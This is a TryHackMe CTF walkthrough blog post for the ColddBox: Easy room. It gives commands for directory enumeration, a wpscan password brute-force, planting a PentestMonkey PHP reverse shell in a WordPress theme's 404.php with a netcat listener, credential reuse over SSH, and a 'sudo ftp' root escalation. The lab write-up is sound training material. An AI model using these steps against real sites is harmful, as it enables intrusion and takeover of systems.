Skip to main content
HashnodeREAPSEC

Command Palette

Search for a command to run...

ColddBox: Easy Room on TryHackMe: Complete Walkthrough and Guide

Updated
3 min read
ColddBox: Easy Room on TryHackMe: Complete Walkthrough and Guide
M
MOHIT SINGH PAPOLA
Part of seriesTRY HACK ME WRITEUPS

LINK - https://tryhackme.com/room/colddboxeasy

OVERVIEW

We are given an IP Address Let’s scan it using NMAP

ENUMERATION

So we have two open ports PORT 80 and PORT 4512 of web and ssh respectively
Also we can see the website is running WordPress 4.1.31 so we can use wpscan on it

Let’s see the website first

There is a login page of WordPress let’s try default username and passwords

But it failed….

So Let’s enumerate directories using gobuster

gobuster dir -u http://10.66.155.139/ -w /usr/share/wordlists/dirb/common.txt -x php,txt

So there we have one /hidden directory let’s check it out

And we found three usernames which we can use to bruteforce the WordPress Login but first let’s run wpscan on the website maybe will find some vulnerable plugin or themes.

wpscan -v -e --url http://10.66.155.139/wp-login.php

And we found nothing useful so let’s bruteforce the passwords with our users using wpscan

wpscan -U users.txt -P /usr/share/wordlists/rockyou.txt --url http://10.66.155.139/

And we found the user c0ldd password now let’s login into the WordPress admin page with the given credentials

We are inside the WordPress site now let’s checkout editor tab in Appearance to see if we can edit some code to get reverse shell

There is 404 Template in the templates section which has 404.php which we can use to get reverse shell

So get the PHP PentestMonkey reverse shell script from revshells.com and paste it in here
Now open a netcat listener in your terminal

nc -lvnp PORT

Now click on Update and you will update the 404.php code

Now navigate to 404.php from the URL so that it can get executed and can give us reverse shell

http://10.66.155.139/wp-content/themes/twentyfifteen/404.php

Go to this site and you will automatically will get the reverse shell

Since we can’t read user.txt as we are not the user c0ldd But
Now we can read the wp-config.php from the /var/www/html directory which we saw in gobuster as it usually has some creds

Seems We were right there is MYSQL DB credential of the user c0ldd
I enumerated the MySQL but didn’t found anything useful rather then the hash of the passwords of the three users we found earlier as their passwords will only work in WordPress website so there is no point in cracking those.

USER FLAG

Then I remembered that this password can be reused somewhere and our PORT 4512 of ssh came into my mind so let’s try using these creds to login as c0ldd

ssh c0ldd@10.66.155.139 -p 4512

Here we go we were right and now you can grab user.txt from /home/c0ldd directory

PRIVILEGE ESCALATION / ROOT FLAG

Now let’s try to escalate privileges and like every time we will start from sudo -l command

And we found it three services that can help me escalating privileges you can either use vim or ftp to escalate privileges but i will here use ftp so

sudo ftp
!/bin/bash

And Like this you got the root flag too.

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

#colddbox-thm#c0lddbox#reapsec#writeup#tryhackme-walkthrough#ctf-writeup#tryhackme

TRY HACK ME WRITEUPS

Part 1 of 4

In this series I will give TryHackMe challenges complete walkthroughs step by step in detail.

Up next

Juicy Details Room on TryHackMe: Complete Walkthrough and Guide

LINK - https://tryhackme.com/room/juicydetails So for this challenge we have given Download Files So let’s download those Now We are asked to answer the question based on the logs files we got so Ques 1) What tools did the attacker use? (Order by t...

More from this blog

R

REAPSEC

26 posts

YOU REAP WHAT YOU SOW!!